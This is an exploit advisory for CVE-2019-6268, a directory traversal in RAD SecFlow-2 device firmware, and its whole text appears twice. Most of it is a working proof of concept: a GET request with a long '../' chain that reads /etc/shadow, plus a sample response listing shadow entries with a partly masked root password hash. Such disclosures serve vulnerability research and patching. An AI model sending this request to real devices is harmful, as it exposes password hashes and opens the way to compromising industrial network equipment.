# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# CVE: CVE-2019-6268
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.
Steps to reproduce:
Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1
Response:
HTTP/1.1 200 OK
root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal
Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).
# CVE: CVE-2019-6268
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.
Steps to reproduce:
Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1
Response:
HTTP/1.1 200 OK
root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal
Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).